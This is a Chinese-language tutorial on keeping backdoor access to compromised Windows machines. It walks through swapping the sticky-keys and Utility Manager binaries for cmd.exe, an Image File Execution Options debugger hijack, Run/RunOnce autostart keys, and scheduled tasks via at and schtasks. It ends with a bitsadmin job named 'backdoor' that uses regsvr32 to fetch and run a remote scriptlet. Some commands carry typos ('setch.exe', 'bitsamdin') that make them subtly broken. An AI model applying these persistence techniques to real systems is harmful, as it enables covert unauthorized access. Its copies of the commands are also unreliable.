Windows權限維持
環境:Win10、Win7、Winxp虛擬機等
0x01 shift後門
windows中有一些輔助功能,能在用戶未登錄系統之前可以通過組合鍵來啓動它,類似的輔助功能有:
C:\Windows\System32\sethc.exe 粘滯鍵,啓動快捷鍵:按五次shift鍵
C:\Windows\System32\utilman.exe 設置中心,啓動快捷鍵:Windows+U鍵
通過替換成cmd.exe的方法達到快捷鍵啓動cmd的目的
shift連按五次
0x02 映像劫持IFEO
跟shift後門差不多,只不過在低版本的windows中,可以簡單的替換程序,而在高版本中替換的文件受到了系統的保護
在註冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option下添加一個項sethc.exe,然後在sethc.exe這個項中添加debugger鍵,鍵值爲惡意程序的路徑
也可以直接
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setch.exe" /v debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
此時打開sethc.exe會打開cmd.exe
0x03 註冊表自啓動項
自啓動項有兩個鍵:Run和RunOnce
Run:該項下的鍵值即爲開機啓動項,每一次開機啓動
RunOnce:鍵值只作用一次,執行完畢後就會自動刪除
常見註冊表啓動項鍵的位置:
用戶級
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
系統級
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run \HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce
此時開機登錄就會自啓cmd
4、定時任務
windows下定時任務的命令有兩個分別是:at和schtasks
at:在win7、08等高版本的windows中不能將任務在前臺執行,只會後臺運行
schtasks:將定時的任務在前臺執行
at 15:39 calc.exe
時間儘量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
schtasks /create /tn test /tr calc.exe /sc minute /mo 1
tn:任務名字
tr:程序名字
sc minute /mo 1:每隔一分鐘運行一次calc.exe
0x05 bits
Bitsadmin從win7之後操作系統就默認包含,可以用來創建上傳或者下載任務。
Bistadmin可以指定下載成功之後要進行什麼命令。
bitsadmin /create [type] DisplayName //創建一個任務
bitsadmin /cancel <Job> //刪除一個任務
bitsadmin /list /allusers /verbose //列出所有任務
bitsadmin /AddFile <Job> <RemoteURL> <LocalName> //給任務test添加一個下載文件
bitsadmin /SetNotifyCmdLine <Job> <ProgramName> [ProgramParameters] //設置在任務完成傳輸時或任務進入狀態時將運行的命令行命令
bitsadmin /Resume <Job> //激活傳輸隊列中的新任務或掛起的任務
bitsadmin /cancel <Job> //刪除某個任務
bitsadmin /reset /allusers //刪除所有任務
bitsadmin /complete <Job> //完成某個任務
創建任務
bitsamdin /create backdoor
添加文檔
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
設置下載成功後要執行的命令
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
執行任務
bitsadmin /Resume backdoor